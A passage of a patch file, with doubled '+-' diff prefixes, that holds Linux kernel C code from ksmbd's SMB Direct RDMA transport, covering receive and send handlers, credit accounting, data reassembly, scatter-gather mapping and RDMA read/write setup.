+-	}
+-	mempool_free(msg, t->sendmsg_mempool);
+-}
+-
+-static int smb_direct_check_recvmsg(struct smb_direct_recvmsg *recvmsg)
+-{
+-	switch (recvmsg->type) {
+-	case SMB_DIRECT_MSG_DATA_TRANSFER: {
+-		struct smb_direct_data_transfer *req =
+-			(struct smb_direct_data_transfer *)recvmsg->packet;
+-		struct smb2_hdr *hdr = (struct smb2_hdr *)(recvmsg->packet
+-				+ le32_to_cpu(req->data_offset));
+-		ksmbd_debug(RDMA,
+-			    "CreditGranted: %u, CreditRequested: %u, DataLength: %u, RemainingDataLength: %u, SMB: %x, Command: %u\n",
+-			    le16_to_cpu(req->credits_granted),
+-			    le16_to_cpu(req->credits_requested),
+-			    req->data_length, req->remaining_data_length,
+-			    hdr->ProtocolId, hdr->Command);
+-		break;
+-	}
+-	case SMB_DIRECT_MSG_NEGOTIATE_REQ: {
+-		struct smb_direct_negotiate_req *req =
+-			(struct smb_direct_negotiate_req *)recvmsg->packet;
+-		ksmbd_debug(RDMA,
+-			    "MinVersion: %u, MaxVersion: %u, CreditRequested: %u, MaxSendSize: %u, MaxRecvSize: %u, MaxFragmentedSize: %u\n",
+-			    le16_to_cpu(req->min_version),
+-			    le16_to_cpu(req->max_version),
+-			    le16_to_cpu(req->credits_requested),
+-			    le32_to_cpu(req->preferred_send_size),
+-			    le32_to_cpu(req->max_receive_size),
+-			    le32_to_cpu(req->max_fragmented_size));
+-		if (le16_to_cpu(req->min_version) > 0x0100 ||
+-		    le16_to_cpu(req->max_version) < 0x0100)
+-			return -EOPNOTSUPP;
+-		if (le16_to_cpu(req->credits_requested) <= 0 ||
+-		    le32_to_cpu(req->max_receive_size) <= 128 ||
+-		    le32_to_cpu(req->max_fragmented_size) <=
+-					128 * 1024)
+-			return -ECONNABORTED;
+-
+-		break;
+-	}
+-	default:
+-		return -EINVAL;
+-	}
+-	return 0;
+-}
+-
+-static void recv_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	struct smb_direct_recvmsg *recvmsg;
+-	struct smb_direct_transport *t;
+-
+-	recvmsg = container_of(wc->wr_cqe, struct smb_direct_recvmsg, cqe);
+-	t = recvmsg->transport;
+-
+-	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_RECV) {
+-		if (wc->status != IB_WC_WR_FLUSH_ERR) {
+-			pr_err("Recv error. status='%s (%d)' opcode=%d\n",
+-			       ib_wc_status_msg(wc->status), wc->status,
+-			       wc->opcode);
+-			smb_direct_disconnect_rdma_connection(t);
+-		}
+-		put_empty_recvmsg(t, recvmsg);
+-		return;
+-	}
+-
+-	ksmbd_debug(RDMA, "Recv completed. status='%s (%d)', opcode=%d\n",
+-		    ib_wc_status_msg(wc->status), wc->status,
+-		    wc->opcode);
+-
+-	ib_dma_sync_single_for_cpu(wc->qp->device, recvmsg->sge.addr,
+-				   recvmsg->sge.length, DMA_FROM_DEVICE);
+-
+-	switch (recvmsg->type) {
+-	case SMB_DIRECT_MSG_NEGOTIATE_REQ:
+-		if (wc->byte_len < sizeof(struct smb_direct_negotiate_req)) {
+-			put_empty_recvmsg(t, recvmsg);
+-			return;
+-		}
+-		t->negotiation_requested = true;
+-		t->full_packet_received = true;
+-		t->status = SMB_DIRECT_CS_CONNECTED;
+-		enqueue_reassembly(t, recvmsg, 0);
+-		wake_up_interruptible(&t->wait_status);
+-		break;
+-	case SMB_DIRECT_MSG_DATA_TRANSFER: {
+-		struct smb_direct_data_transfer *data_transfer =
+-			(struct smb_direct_data_transfer *)recvmsg->packet;
+-		unsigned int data_length;
+-		int avail_recvmsg_count, receive_credits;
+-
+-		if (wc->byte_len <
+-		    offsetof(struct smb_direct_data_transfer, padding)) {
+-			put_empty_recvmsg(t, recvmsg);
+-			return;
+-		}
+-
+-		data_length = le32_to_cpu(data_transfer->data_length);
+-		if (data_length) {
+-			if (wc->byte_len < sizeof(struct smb_direct_data_transfer) +
+-			    (u64)data_length) {
+-				put_empty_recvmsg(t, recvmsg);
+-				return;
+-			}
+-
+-			if (t->full_packet_received)
+-				recvmsg->first_segment = true;
+-
+-			if (le32_to_cpu(data_transfer->remaining_data_length))
+-				t->full_packet_received = false;
+-			else
+-				t->full_packet_received = true;
+-
+-			enqueue_reassembly(t, recvmsg, (int)data_length);
+-			wake_up_interruptible(&t->wait_reassembly_queue);
+-
+-			spin_lock(&t->receive_credit_lock);
+-			receive_credits = --(t->recv_credits);
+-			avail_recvmsg_count = t->count_avail_recvmsg;
+-			spin_unlock(&t->receive_credit_lock);
+-		} else {
+-			put_empty_recvmsg(t, recvmsg);
+-
+-			spin_lock(&t->receive_credit_lock);
+-			receive_credits = --(t->recv_credits);
+-			avail_recvmsg_count = ++(t->count_avail_recvmsg);
+-			spin_unlock(&t->receive_credit_lock);
+-		}
+-
+-		t->recv_credit_target =
+-				le16_to_cpu(data_transfer->credits_requested);
+-		atomic_add(le16_to_cpu(data_transfer->credits_granted),
+-			   &t->send_credits);
+-
+-		if (le16_to_cpu(data_transfer->flags) &
+-		    SMB_DIRECT_RESPONSE_REQUESTED)
+-			queue_work(smb_direct_wq, &t->send_immediate_work);
+-
+-		if (atomic_read(&t->send_credits) > 0)
+-			wake_up_interruptible(&t->wait_send_credits);
+-
+-		if (is_receive_credit_post_required(receive_credits, avail_recvmsg_count))
+-			mod_delayed_work(smb_direct_wq,
+-					 &t->post_recv_credits_work, 0);
+-		break;
+-	}
+-	default:
+-		break;
+-	}
+-}
+-
+-static int smb_direct_post_recv(struct smb_direct_transport *t,
+-				struct smb_direct_recvmsg *recvmsg)
+-{
+-	struct ib_recv_wr wr;
+-	int ret;
+-
+-	recvmsg->sge.addr = ib_dma_map_single(t->cm_id->device,
+-					      recvmsg->packet, t->max_recv_size,
+-					      DMA_FROM_DEVICE);
+-	ret = ib_dma_mapping_error(t->cm_id->device, recvmsg->sge.addr);
+-	if (ret)
+-		return ret;
+-	recvmsg->sge.length = t->max_recv_size;
+-	recvmsg->sge.lkey = t->pd->local_dma_lkey;
+-	recvmsg->cqe.done = recv_done;
+-
+-	wr.wr_cqe = &recvmsg->cqe;
+-	wr.next = NULL;
+-	wr.sg_list = &recvmsg->sge;
+-	wr.num_sge = 1;
+-
+-	ret = ib_post_recv(t->qp, &wr, NULL);
+-	if (ret) {
+-		pr_err("Can't post recv: %d\n", ret);
+-		ib_dma_unmap_single(t->cm_id->device,
+-				    recvmsg->sge.addr, recvmsg->sge.length,
+-				    DMA_FROM_DEVICE);
+-		smb_direct_disconnect_rdma_connection(t);
+-		return ret;
+-	}
+-	return ret;
+-}
+-
+-static int smb_direct_read(struct ksmbd_transport *t, char *buf,
+-			   unsigned int size, int unused)
+-{
+-	struct smb_direct_recvmsg *recvmsg;
+-	struct smb_direct_data_transfer *data_transfer;
+-	int to_copy, to_read, data_read, offset;
+-	u32 data_length, remaining_data_length, data_offset;
+-	int rc;
+-	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
+-
+-again:
+-	if (st->status != SMB_DIRECT_CS_CONNECTED) {
+-		pr_err("disconnected\n");
+-		return -ENOTCONN;
+-	}
+-
+-	/*
+-	 * No need to hold the reassembly queue lock all the time as we are
+-	 * the only one reading from the front of the queue. The transport
+-	 * may add more entries to the back of the queue at the same time
+-	 */
+-	if (st->reassembly_data_length >= size) {
+-		int queue_length;
+-		int queue_removed = 0;
+-
+-		/*
+-		 * Need to make sure reassembly_data_length is read before
+-		 * reading reassembly_queue_length and calling
+-		 * get_first_reassembly. This call is lock free
+-		 * as we never read the end of the queue, which is being
+-		 * updated in SOFTIRQ as more data is received
+-		 */
+-		virt_rmb();
+-		queue_length = st->reassembly_queue_length;
+-		data_read = 0;
+-		to_read = size;
+-		offset = st->first_entry_offset;
+-		while (data_read < size) {
+-			recvmsg = get_first_reassembly(st);
+-			data_transfer = smb_direct_recvmsg_payload(recvmsg);
+-			data_length = le32_to_cpu(data_transfer->data_length);
+-			remaining_data_length =
+-				le32_to_cpu(data_transfer->remaining_data_length);
+-			data_offset = le32_to_cpu(data_transfer->data_offset);
+-
+-			/*
+-			 * The upper layer expects RFC1002 length at the
+-			 * beginning of the payload. Return it to indicate
+-			 * the total length of the packet. This minimizes the
+-			 * change to upper-layer packet processing logic. It
+-			 * will eventually be removed when an intermediate
+-			 * transport layer is added
+-			 */
+-			if (recvmsg->first_segment && size == 4) {
+-				unsigned int rfc1002_len =
+-					data_length + remaining_data_length;
+-				*((__be32 *)buf) = cpu_to_be32(rfc1002_len);
+-				data_read = 4;
+-				recvmsg->first_segment = false;
+-				ksmbd_debug(RDMA,
+-					    "returning rfc1002 length %d\n",
+-					    rfc1002_len);
+-				goto read_rfc1002_done;
+-			}
+-
+-			to_copy = min_t(int, data_length - offset, to_read);
+-			memcpy(buf + data_read, (char *)data_transfer + data_offset + offset,
+-			       to_copy);
+-
+-			/* move on to the next buffer? */
+-			if (to_copy == data_length - offset) {
+-				queue_length--;
+-				/*
+-				 * No need to lock if we are not at the
+-				 * end of the queue
+-				 */
+-				if (queue_length) {
+-					list_del(&recvmsg->list);
+-				} else {
+-					spin_lock_irq(&st->reassembly_queue_lock);
+-					list_del(&recvmsg->list);
+-					spin_unlock_irq(&st->reassembly_queue_lock);
+-				}
+-				queue_removed++;
+-				put_recvmsg(st, recvmsg);
+-				offset = 0;
+-			} else {
+-				offset += to_copy;
+-			}
+-
+-			to_read -= to_copy;
+-			data_read += to_copy;
+-		}
+-
+-		spin_lock_irq(&st->reassembly_queue_lock);
+-		st->reassembly_data_length -= data_read;
+-		st->reassembly_queue_length -= queue_removed;
+-		spin_unlock_irq(&st->reassembly_queue_lock);
+-
+-		spin_lock(&st->receive_credit_lock);
+-		st->count_avail_recvmsg += queue_removed;
+-		if (is_receive_credit_post_required(st->recv_credits, st->count_avail_recvmsg)) {
+-			spin_unlock(&st->receive_credit_lock);
+-			mod_delayed_work(smb_direct_wq,
+-					 &st->post_recv_credits_work, 0);
+-		} else {
+-			spin_unlock(&st->receive_credit_lock);
+-		}
+-
+-		st->first_entry_offset = offset;
+-		ksmbd_debug(RDMA,
+-			    "returning to thread data_read=%d reassembly_data_length=%d first_entry_offset=%d\n",
+-			    data_read, st->reassembly_data_length,
+-			    st->first_entry_offset);
+-read_rfc1002_done:
+-		return data_read;
+-	}
+-
+-	ksmbd_debug(RDMA, "wait_event on more data\n");
+-	rc = wait_event_interruptible(st->wait_reassembly_queue,
+-				      st->reassembly_data_length >= size ||
+-				       st->status != SMB_DIRECT_CS_CONNECTED);
+-	if (rc)
+-		return -EINTR;
+-
+-	goto again;
+-}
+-
+-static void smb_direct_post_recv_credits(struct work_struct *work)
+-{
+-	struct smb_direct_transport *t = container_of(work,
+-		struct smb_direct_transport, post_recv_credits_work.work);
+-	struct smb_direct_recvmsg *recvmsg;
+-	int receive_credits, credits = 0;
+-	int ret;
+-	int use_free = 1;
+-
+-	spin_lock(&t->receive_credit_lock);
+-	receive_credits = t->recv_credits;
+-	spin_unlock(&t->receive_credit_lock);
+-
+-	if (receive_credits < t->recv_credit_target) {
+-		while (true) {
+-			if (use_free)
+-				recvmsg = get_free_recvmsg(t);
+-			else
+-				recvmsg = get_empty_recvmsg(t);
+-			if (!recvmsg) {
+-				if (use_free) {
+-					use_free = 0;
+-					continue;
+-				} else {
+-					break;
+-				}
+-			}
+-
+-			recvmsg->type = SMB_DIRECT_MSG_DATA_TRANSFER;
+-			recvmsg->first_segment = false;
+-
+-			ret = smb_direct_post_recv(t, recvmsg);
+-			if (ret) {
+-				pr_err("Can't post recv: %d\n", ret);
+-				put_recvmsg(t, recvmsg);
+-				break;
+-			}
+-			credits++;
+-		}
+-	}
+-
+-	spin_lock(&t->receive_credit_lock);
+-	t->recv_credits += credits;
+-	t->count_avail_recvmsg -= credits;
+-	spin_unlock(&t->receive_credit_lock);
+-
+-	spin_lock(&t->lock_new_recv_credits);
+-	t->new_recv_credits += credits;
+-	spin_unlock(&t->lock_new_recv_credits);
+-
+-	if (credits)
+-		queue_work(smb_direct_wq, &t->send_immediate_work);
+-}
+-
+-static void send_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	struct smb_direct_sendmsg *sendmsg, *sibling;
+-	struct smb_direct_transport *t;
+-	struct list_head *pos, *prev, *end;
+-
+-	sendmsg = container_of(wc->wr_cqe, struct smb_direct_sendmsg, cqe);
+-	t = sendmsg->transport;
+-
+-	ksmbd_debug(RDMA, "Send completed. status='%s (%d)', opcode=%d\n",
+-		    ib_wc_status_msg(wc->status), wc->status,
+-		    wc->opcode);
+-
+-	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_SEND) {
+-		pr_err("Send error. status='%s (%d)', opcode=%d\n",
+-		       ib_wc_status_msg(wc->status), wc->status,
+-		       wc->opcode);
+-		smb_direct_disconnect_rdma_connection(t);
+-	}
+-
+-	if (atomic_dec_and_test(&t->send_pending))
+-		wake_up(&t->wait_send_pending);
+-
+-	/* iterate and free the list of messages in reverse. the list's head
+-	 * is invalid.
+-	 */
+-	for (pos = &sendmsg->list, prev = pos->prev, end = sendmsg->list.next;
+-	     prev != end; pos = prev, prev = prev->prev) {
+-		sibling = container_of(pos, struct smb_direct_sendmsg, list);
+-		smb_direct_free_sendmsg(t, sibling);
+-	}
+-
+-	sibling = container_of(pos, struct smb_direct_sendmsg, list);
+-	smb_direct_free_sendmsg(t, sibling);
+-}
+-
+-static int manage_credits_prior_sending(struct smb_direct_transport *t)
+-{
+-	int new_credits;
+-
+-	spin_lock(&t->lock_new_recv_credits);
+-	new_credits = t->new_recv_credits;
+-	t->new_recv_credits = 0;
+-	spin_unlock(&t->lock_new_recv_credits);
+-
+-	return new_credits;
+-}
+-
+-static int smb_direct_post_send(struct smb_direct_transport *t,
+-				struct ib_send_wr *wr)
+-{
+-	int ret;
+-
+-	atomic_inc(&t->send_pending);
+-	ret = ib_post_send(t->qp, wr, NULL);
+-	if (ret) {
+-		pr_err("failed to post send: %d\n", ret);
+-		if (atomic_dec_and_test(&t->send_pending))
+-			wake_up(&t->wait_send_pending);
+-		smb_direct_disconnect_rdma_connection(t);
+-	}
+-	return ret;
+-}
+-
+-static void smb_direct_send_ctx_init(struct smb_direct_transport *t,
+-				     struct smb_direct_send_ctx *send_ctx,
+-				     bool need_invalidate_rkey,
+-				     unsigned int remote_key)
+-{
+-	INIT_LIST_HEAD(&send_ctx->msg_list);
+-	send_ctx->wr_cnt = 0;
+-	send_ctx->need_invalidate_rkey = need_invalidate_rkey;
+-	send_ctx->remote_key = remote_key;
+-}
+-
+-static int smb_direct_flush_send_list(struct smb_direct_transport *t,
+-				      struct smb_direct_send_ctx *send_ctx,
+-				      bool is_last)
+-{
+-	struct smb_direct_sendmsg *first, *last;
+-	int ret;
+-
+-	if (list_empty(&send_ctx->msg_list))
+-		return 0;
+-
+-	first = list_first_entry(&send_ctx->msg_list,
+-				 struct smb_direct_sendmsg,
+-				 list);
+-	last = list_last_entry(&send_ctx->msg_list,
+-			       struct smb_direct_sendmsg,
+-			       list);
+-
+-	last->wr.send_flags = IB_SEND_SIGNALED;
+-	last->wr.wr_cqe = &last->cqe;
+-	if (is_last && send_ctx->need_invalidate_rkey) {
+-		last->wr.opcode = IB_WR_SEND_WITH_INV;
+-		last->wr.ex.invalidate_rkey = send_ctx->remote_key;
+-	}
+-
+-	ret = smb_direct_post_send(t, &first->wr);
+-	if (!ret) {
+-		smb_direct_send_ctx_init(t, send_ctx,
+-					 send_ctx->need_invalidate_rkey,
+-					 send_ctx->remote_key);
+-	} else {
+-		atomic_add(send_ctx->wr_cnt, &t->send_credits);
+-		wake_up(&t->wait_send_credits);
+-		list_for_each_entry_safe(first, last, &send_ctx->msg_list,
+-					 list) {
+-			smb_direct_free_sendmsg(t, first);
+-		}
+-	}
+-	return ret;
+-}
+-
+-static int wait_for_credits(struct smb_direct_transport *t,
+-			    wait_queue_head_t *waitq, atomic_t *total_credits,
+-			    int needed)
+-{
+-	int ret;
+-
+-	do {
+-		if (atomic_sub_return(needed, total_credits) >= 0)
+-			return 0;
+-
+-		atomic_add(needed, total_credits);
+-		ret = wait_event_interruptible(*waitq,
+-					       atomic_read(total_credits) >= needed ||
+-					       t->status != SMB_DIRECT_CS_CONNECTED);
+-
+-		if (t->status != SMB_DIRECT_CS_CONNECTED)
+-			return -ENOTCONN;
+-		else if (ret < 0)
+-			return ret;
+-	} while (true);
+-}
+-
+-static int wait_for_send_credits(struct smb_direct_transport *t,
+-				 struct smb_direct_send_ctx *send_ctx)
+-{
+-	int ret;
+-
+-	if (send_ctx &&
+-	    (send_ctx->wr_cnt >= 16 || atomic_read(&t->send_credits) <= 1)) {
+-		ret = smb_direct_flush_send_list(t, send_ctx, false);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	return wait_for_credits(t, &t->wait_send_credits, &t->send_credits, 1);
+-}
+-
+-static int wait_for_rw_credits(struct smb_direct_transport *t, int credits)
+-{
+-	return wait_for_credits(t, &t->wait_rw_credits, &t->rw_credits, credits);
+-}
+-
+-static int calc_rw_credits(struct smb_direct_transport *t,
+-			   char *buf, unsigned int len)
+-{
+-	return DIV_ROUND_UP(get_buf_page_count(buf, len),
+-			    t->pages_per_rw_credit);
+-}
+-
+-static int smb_direct_create_header(struct smb_direct_transport *t,
+-				    int size, int remaining_data_length,
+-				    struct smb_direct_sendmsg **sendmsg_out)
+-{
+-	struct smb_direct_sendmsg *sendmsg;
+-	struct smb_direct_data_transfer *packet;
+-	int header_length;
+-	int ret;
+-
+-	sendmsg = smb_direct_alloc_sendmsg(t);
+-	if (IS_ERR(sendmsg))
+-		return PTR_ERR(sendmsg);
+-
+-	/* Fill in the packet header */
+-	packet = (struct smb_direct_data_transfer *)sendmsg->packet;
+-	packet->credits_requested = cpu_to_le16(t->send_credit_target);
+-	packet->credits_granted = cpu_to_le16(manage_credits_prior_sending(t));
+-
+-	packet->flags = 0;
+-	packet->reserved = 0;
+-	if (!size)
+-		packet->data_offset = 0;
+-	else
+-		packet->data_offset = cpu_to_le32(24);
+-	packet->data_length = cpu_to_le32(size);
+-	packet->remaining_data_length = cpu_to_le32(remaining_data_length);
+-	packet->padding = 0;
+-
+-	ksmbd_debug(RDMA,
+-		    "credits_requested=%d credits_granted=%d data_offset=%d data_length=%d remaining_data_length=%d\n",
+-		    le16_to_cpu(packet->credits_requested),
+-		    le16_to_cpu(packet->credits_granted),
+-		    le32_to_cpu(packet->data_offset),
+-		    le32_to_cpu(packet->data_length),
+-		    le32_to_cpu(packet->remaining_data_length));
+-
+-	/* Map the packet to DMA */
+-	header_length = sizeof(struct smb_direct_data_transfer);
+-	/* If this is a packet without payload, don't send padding */
+-	if (!size)
+-		header_length =
+-			offsetof(struct smb_direct_data_transfer, padding);
+-
+-	sendmsg->sge[0].addr = ib_dma_map_single(t->cm_id->device,
+-						 (void *)packet,
+-						 header_length,
+-						 DMA_TO_DEVICE);
+-	ret = ib_dma_mapping_error(t->cm_id->device, sendmsg->sge[0].addr);
+-	if (ret) {
+-		smb_direct_free_sendmsg(t, sendmsg);
+-		return ret;
+-	}
+-
+-	sendmsg->num_sge = 1;
+-	sendmsg->sge[0].length = header_length;
+-	sendmsg->sge[0].lkey = t->pd->local_dma_lkey;
+-
+-	*sendmsg_out = sendmsg;
+-	return 0;
+-}
+-
+-static int get_sg_list(void *buf, int size, struct scatterlist *sg_list, int nentries)
+-{
+-	bool high = is_vmalloc_addr(buf);
+-	struct page *page;
+-	int offset, len;
+-	int i = 0;
+-
+-	if (size <= 0 || nentries < get_buf_page_count(buf, size))
+-		return -EINVAL;
+-
+-	offset = offset_in_page(buf);
+-	buf -= offset;
+-	while (size > 0) {
+-		len = min_t(int, PAGE_SIZE - offset, size);
+-		if (high)
+-			page = vmalloc_to_page(buf);
+-		else
+-			page = kmap_to_page(buf);
+-
+-		if (!sg_list)
+-			return -EINVAL;
+-		sg_set_page(sg_list, page, len, offset);
+-		sg_list = sg_next(sg_list);
+-
+-		buf += PAGE_SIZE;
+-		size -= len;
+-		offset = 0;
+-		i++;
+-	}
+-	return i;
+-}
+-
+-static int get_mapped_sg_list(struct ib_device *device, void *buf, int size,
+-			      struct scatterlist *sg_list, int nentries,
+-			      enum dma_data_direction dir)
+-{
+-	int npages;
+-
+-	npages = get_sg_list(buf, size, sg_list, nentries);
+-	if (npages < 0)
+-		return -EINVAL;
+-	return ib_dma_map_sg(device, sg_list, npages, dir);
+-}
+-
+-static int post_sendmsg(struct smb_direct_transport *t,
+-			struct smb_direct_send_ctx *send_ctx,
+-			struct smb_direct_sendmsg *msg)
+-{
+-	int i;
+-
+-	for (i = 0; i < msg->num_sge; i++)
+-		ib_dma_sync_single_for_device(t->cm_id->device,
+-					      msg->sge[i].addr, msg->sge[i].length,
+-					      DMA_TO_DEVICE);
+-
+-	msg->cqe.done = send_done;
+-	msg->wr.opcode = IB_WR_SEND;
+-	msg->wr.sg_list = &msg->sge[0];
+-	msg->wr.num_sge = msg->num_sge;
+-	msg->wr.next = NULL;
+-
+-	if (send_ctx) {
+-		msg->wr.wr_cqe = NULL;
+-		msg->wr.send_flags = 0;
+-		if (!list_empty(&send_ctx->msg_list)) {
+-			struct smb_direct_sendmsg *last;
+-
+-			last = list_last_entry(&send_ctx->msg_list,
+-					       struct smb_direct_sendmsg,
+-					       list);
+-			last->wr.next = &msg->wr;
+-		}
+-		list_add_tail(&msg->list, &send_ctx->msg_list);
+-		send_ctx->wr_cnt++;
+-		return 0;
+-	}
+-
+-	msg->wr.wr_cqe = &msg->cqe;
+-	msg->wr.send_flags = IB_SEND_SIGNALED;
+-	return smb_direct_post_send(t, &msg->wr);
+-}
+-
+-static int smb_direct_post_send_data(struct smb_direct_transport *t,
+-				     struct smb_direct_send_ctx *send_ctx,
+-				     struct kvec *iov, int niov,
+-				     int remaining_data_length)
+-{
+-	int i, j, ret;
+-	struct smb_direct_sendmsg *msg;
+-	int data_length;
+-	struct scatterlist sg[SMB_DIRECT_MAX_SEND_SGES - 1];
+-
+-	ret = wait_for_send_credits(t, send_ctx);
+-	if (ret)
+-		return ret;
+-
+-	data_length = 0;
+-	for (i = 0; i < niov; i++)
+-		data_length += iov[i].iov_len;
+-
+-	ret = smb_direct_create_header(t, data_length, remaining_data_length,
+-				       &msg);
+-	if (ret) {
+-		atomic_inc(&t->send_credits);
+-		return ret;
+-	}
+-
+-	for (i = 0; i < niov; i++) {
+-		struct ib_sge *sge;
+-		int sg_cnt;
+-
+-		sg_init_table(sg, SMB_DIRECT_MAX_SEND_SGES - 1);
+-		sg_cnt = get_mapped_sg_list(t->cm_id->device,
+-					    iov[i].iov_base, iov[i].iov_len,
+-					    sg, SMB_DIRECT_MAX_SEND_SGES - 1,
+-					    DMA_TO_DEVICE);
+-		if (sg_cnt <= 0) {
+-			pr_err("failed to map buffer\n");
+-			ret = -ENOMEM;
+-			goto err;
+-		} else if (sg_cnt + msg->num_sge > SMB_DIRECT_MAX_SEND_SGES) {
+-			pr_err("buffer not fitted into sges\n");
+-			ret = -E2BIG;
+-			ib_dma_unmap_sg(t->cm_id->device, sg, sg_cnt,
+-					DMA_TO_DEVICE);
+-			goto err;
+-		}
+-
+-		for (j = 0; j < sg_cnt; j++) {
+-			sge = &msg->sge[msg->num_sge];
+-			sge->addr = sg_dma_address(&sg[j]);
+-			sge->length = sg_dma_len(&sg[j]);
+-			sge->lkey  = t->pd->local_dma_lkey;
+-			msg->num_sge++;
+-		}
+-	}
+-
+-	ret = post_sendmsg(t, send_ctx, msg);
+-	if (ret)
+-		goto err;
+-	return 0;
+-err:
+-	smb_direct_free_sendmsg(t, msg);
+-	atomic_inc(&t->send_credits);
+-	return ret;
+-}
+-
+-static int smb_direct_writev(struct ksmbd_transport *t,
+-			     struct kvec *iov, int niovs, int buflen,
+-			     bool need_invalidate, unsigned int remote_key)
+-{
+-	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
+-	int remaining_data_length;
+-	int start, i, j;
+-	int max_iov_size = st->max_send_size -
+-			sizeof(struct smb_direct_data_transfer);
+-	int ret;
+-	struct kvec vec;
+-	struct smb_direct_send_ctx send_ctx;
+-
+-	if (st->status != SMB_DIRECT_CS_CONNECTED)
+-		return -ENOTCONN;
+-
+-	//FIXME: skip RFC1002 header..
+-	buflen -= 4;
+-	iov[0].iov_base += 4;
+-	iov[0].iov_len -= 4;
+-
+-	remaining_data_length = buflen;
+-	ksmbd_debug(RDMA, "Sending smb (RDMA): smb_len=%u\n", buflen);
+-
+-	smb_direct_send_ctx_init(st, &send_ctx, need_invalidate, remote_key);
+-	start = i = 0;
+-	buflen = 0;
+-	while (true) {
+-		buflen += iov[i].iov_len;
+-		if (buflen > max_iov_size) {
+-			if (i > start) {
+-				remaining_data_length -=
+-					(buflen - iov[i].iov_len);
+-				ret = smb_direct_post_send_data(st, &send_ctx,
+-								&iov[start], i - start,
+-								remaining_data_length);
+-				if (ret)
+-					goto done;
+-			} else {
+-				/* iov[start] is too big, break it */
+-				int nvec  = (buflen + max_iov_size - 1) /
+-						max_iov_size;
+-
+-				for (j = 0; j < nvec; j++) {
+-					vec.iov_base =
+-						(char *)iov[start].iov_base +
+-						j * max_iov_size;
+-					vec.iov_len =
+-						min_t(int, max_iov_size,
+-						      buflen - max_iov_size * j);
+-					remaining_data_length -= vec.iov_len;
+-					ret = smb_direct_post_send_data(st, &send_ctx, &vec, 1,
+-									remaining_data_length);
+-					if (ret)
+-						goto done;
+-				}
+-				i++;
+-				if (i == niovs)
+-					break;
+-			}
+-			start = i;
+-			buflen = 0;
+-		} else {
+-			i++;
+-			if (i == niovs) {
+-				/* send out all remaining vecs */
+-				remaining_data_length -= buflen;
+-				ret = smb_direct_post_send_data(st, &send_ctx,
+-								&iov[start], i - start,
+-								remaining_data_length);
+-				if (ret)
+-					goto done;
+-				break;
+-			}
+-		}
+-	}
+-
+-done:
+-	ret = smb_direct_flush_send_list(st, &send_ctx, true);
+-
+-	/*
+-	 * As an optimization, we don't wait for individual I/O to finish
+-	 * before sending the next one.
+-	 * Send them all and wait for pending send count to get to 0
+-	 * that means all the I/Os have been out and we are good to return
+-	 */
+-
+-	wait_event(st->wait_send_pending,
+-		   atomic_read(&st->send_pending) == 0);
+-	return ret;
+-}
+-
+-static void smb_direct_free_rdma_rw_msg(struct smb_direct_transport *t,
+-					struct smb_direct_rdma_rw_msg *msg,
+-					enum dma_data_direction dir)
+-{
+-	rdma_rw_ctx_destroy(&msg->rw_ctx, t->qp, t->qp->port,
+-			    msg->sgt.sgl, msg->sgt.nents, dir);
+-	sg_free_table_chained(&msg->sgt, SG_CHUNK_SIZE);
+-	kfree(msg);
+-}
+-
+-static void read_write_done(struct ib_cq *cq, struct ib_wc *wc,
+-			    enum dma_data_direction dir)
+-{
+-	struct smb_direct_rdma_rw_msg *msg = container_of(wc->wr_cqe,
+-							  struct smb_direct_rdma_rw_msg, cqe);
+-	struct smb_direct_transport *t = msg->t;
+-
+-	if (wc->status != IB_WC_SUCCESS) {
+-		msg->status = -EIO;
+-		pr_err("read/write error. opcode = %d, status = %s(%d)\n",
+-		       wc->opcode, ib_wc_status_msg(wc->status), wc->status);
+-		if (wc->status != IB_WC_WR_FLUSH_ERR)
+-			smb_direct_disconnect_rdma_connection(t);
+-	}
+-
+-	complete(msg->completion);
+-}
+-
+-static void read_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	read_write_done(cq, wc, DMA_FROM_DEVICE);
+-}
+-
+-static void write_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	read_write_done(cq, wc, DMA_TO_DEVICE);
+-}
+-
+-static int smb_direct_rdma_xmit(struct smb_direct_transport *t,
+-				void *buf, int buf_len,
+-				struct smb2_buffer_desc_v1 *desc,
+-				unsigned int desc_len,
+-				bool is_read)
+-{
+-	struct smb_direct_rdma_rw_msg *msg, *next_msg;
+-	int i, ret;
+-	DECLARE_COMPLETION_ONSTACK(completion);
+-	struct ib_send_wr *first_wr;
+-	LIST_HEAD(msg_list);
+-	char *desc_buf;
+-	int credits_needed;
+-	unsigned int desc_buf_len;
+-	size_t total_length = 0;
+-
+-	if (t->status != SMB_DIRECT_CS_CONNECTED)
+-		return -ENOTCONN;
+-
+-	/* calculate needed credits */
+-	credits_needed = 0;
+-	desc_buf = buf;
+-	for (i = 0; i < desc_len / sizeof(*desc); i++) {
+-		desc_buf_len = le32_to_cpu(desc[i].length);
+-
+-		credits_needed += calc_rw_credits(t, desc_buf, desc_buf_len);
+-		desc_buf += desc_buf_len;
+-		total_length += desc_buf_len;
+-		if (desc_buf_len == 0 || total_length > buf_len ||
+-		    total_length > t->max_rdma_rw_size)
+-			return -EINVAL;
+-	}
+-
+-	ksmbd_debug(RDMA, "RDMA %s, len %#x, needed credits %#x\n",
+-		    is_read ? "read" : "write", buf_len, credits_needed);
+-
+-	ret = wait_for_rw_credits(t, credits_needed);
+-	if (ret < 0)
+-		return ret;
+-
+-	/* build rdma_rw_ctx for each descriptor */
+-	desc_buf = buf;
+-	for (i = 0; i < desc_len / sizeof(*desc); i++) {
+-		msg = kzalloc(offsetof(struct smb_direct_rdma_rw_msg, sg_list) +
+-			      sizeof(struct scatterlist) * SG_CHUNK_SIZE, GFP_KERNEL);
+-		if (!msg) {
+-			ret = -ENOMEM;
+-			goto out;
+-		}
+-
+-		desc_buf_len = le32_to_cpu(desc[i].length);
+-
+-		msg->t = t;
+-		msg->cqe.done = is_read ? read_done : write_done;
+-		msg->completion = &completion;
+-
+-		msg->sgt.sgl = &msg->sg_list[0];
+-		ret = sg_alloc_table_chained(&msg->sgt,
+-					     get_buf_page_count(desc_buf, desc_buf_len),
+-					     msg->sg_list, SG_CHUNK_SIZE);
+-		if (ret) {
+-			kfree(msg);
+-			ret = -ENOMEM;
+-			goto out;
